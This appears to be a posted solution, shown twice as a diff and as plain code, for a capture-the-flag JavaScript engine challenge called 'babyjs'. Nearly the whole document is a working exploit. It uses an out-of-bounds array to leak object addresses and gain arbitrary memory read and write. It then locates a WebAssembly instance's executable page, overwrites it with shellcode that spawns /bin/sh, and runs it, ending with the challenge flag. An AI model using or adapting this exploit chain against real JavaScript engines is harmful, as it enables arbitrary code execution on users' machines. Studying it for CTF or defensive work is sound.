wbowling · April 20, 2019 11:45
diff --git a/babyjs.js b/babyjs.js
 let oob_arr = [1.1, 0x61616161, 3.3];

 function getSetValue(i, v) {
  if (v) {
    oob_arr[i] = v;
  } else {
    return oob_arr[i];
  }
 }

 var leak_obj = { marker: 0x41414141, obj: {} };
 var rw_buf = new ArrayBuffer(0x41);

 for (var i = 0; i < 100000; i++) {
  getSetValue(0);
  getSetValue(0, 1.1);
 }

 var leak_i;
 for (let i = 0; i < 1000; i++) {
    let val = Int64.fromDouble(getSetValue(i)).toString();
    if (val === "0x4141414100000000") {
        leak_i = i + 1;
        break;
    }
 }

 var rw_i;
 for (let i = 0; i < 300; i++) {
    let val = Int64.fromDouble(getSetValue(i)).toString();
    if (val === "0x0000000000000041") {
        getSetValue(i, (new Int64("7fffffff")).asDouble());
        rw_i = i + 1;
        break;
    }
 }

 function addof(obj) {
  leak_obj.obj = obj
  return Int64.fromDouble(getSetValue(leak_i))
 }

 function read(addr, size) {
    getSetValue(rw_i, new Int64(addr).asDouble());
    let a = new Uint8Array(rw_buf, 0, size);
    return Array.from(a);
 }

 function write(addr, bytes) {
    getSetValue(rw_i, new Int64(addr).asDouble());
    let a = new Uint8Array(rw_buf);
    a.set(bytes);
 }

 function read64(addr) {
  var a = read(addr, 8);
  return new Int64(a)
 }

 var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
 let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
 let f = wasm_mod.exports.hello;
 let f_addr = addof(f);
 console.log("f_addr", f_addr);

 wasm_mod_addr = addof(wasm_mod)
 console.log("wasm_mod_addr", wasm_mod_addr);
 rwx = read64(wasm_mod_addr-1+8*30)
 console.log("rwx", rwx);

 let shellcode = [0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5];
 write(rwx, shellcode);
 f();

 // TG19{all_aboard_the_JS_exploitation_train_e11185b6e35c1b767174dc988aa0f179}
	let oob_arr = [1.1, 0x61616161, 3.3];

	function getSetValue(i, v) {
	if (v) {
	oob_arr[i] = v;
	} else {
	return oob_arr[i];
	}
	}

	var leak_obj = { marker: 0x41414141, obj: {} };
	var rw_buf = new ArrayBuffer(0x41);

	for (var i = 0; i < 100000; i++) {
	getSetValue(0);
	getSetValue(0, 1.1);
	}

	var leak_i;
	for (let i = 0; i < 1000; i++) {
	let val = Int64.fromDouble(getSetValue(i)).toString();
	if (val === "0x4141414100000000") {
	leak_i = i + 1;
	break;
	}
	}

	var rw_i;
	for (let i = 0; i < 300; i++) {
	let val = Int64.fromDouble(getSetValue(i)).toString();
	if (val === "0x0000000000000041") {
	getSetValue(i, (new Int64("7fffffff")).asDouble());
	rw_i = i + 1;
	break;
	}
	}

	function addof(obj) {
	leak_obj.obj = obj
	return Int64.fromDouble(getSetValue(leak_i))
	}

	function read(addr, size) {
	getSetValue(rw_i, new Int64(addr).asDouble());
	let a = new Uint8Array(rw_buf, 0, size);
	return Array.from(a);
	}

	function write(addr, bytes) {
	getSetValue(rw_i, new Int64(addr).asDouble());
	let a = new Uint8Array(rw_buf);
	a.set(bytes);
	}

	function read64(addr) {
	var a = read(addr, 8);
	return new Int64(a)
	}

	var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,146,128,128,128,0,2,6,109,101,109,111,114,121,2,0,5,104,101,108,108,111,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,16,11,11,146,128,128,128,0,1,0,65,16,11,12,72,101,108,108,111,32,87,111,114,108,100,0]);
	let wasm_mod = new WebAssembly.Instance(new WebAssembly.Module(wasm_code), {});
	let f = wasm_mod.exports.hello;
	let f_addr = addof(f);
	console.log("f_addr", f_addr);

	wasm_mod_addr = addof(wasm_mod)
	console.log("wasm_mod_addr", wasm_mod_addr);
	rwx = read64(wasm_mod_addr-1+8*30)
	console.log("rwx", rwx);

	let shellcode = [0x6a, 0x68, 0x48, 0xb8, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x2f, 0x2f, 0x73, 0x50, 0x48, 0x89, 0xe7, 0x68, 0x72, 0x69, 0x1, 0x1, 0x81, 0x34, 0x24, 0x1, 0x1, 0x1, 0x1, 0x31, 0xf6, 0x56, 0x6a, 0x8, 0x5e, 0x48, 0x1, 0xe6, 0x56, 0x48, 0x89, 0xe6, 0x31, 0xd2, 0x6a, 0x3b, 0x58, 0xf, 0x5];
	write(rwx, shellcode);
	f();

	// TG19{all_aboard_the_JS_exploitation_train_e11185b6e35c1b767174dc988aa0f179}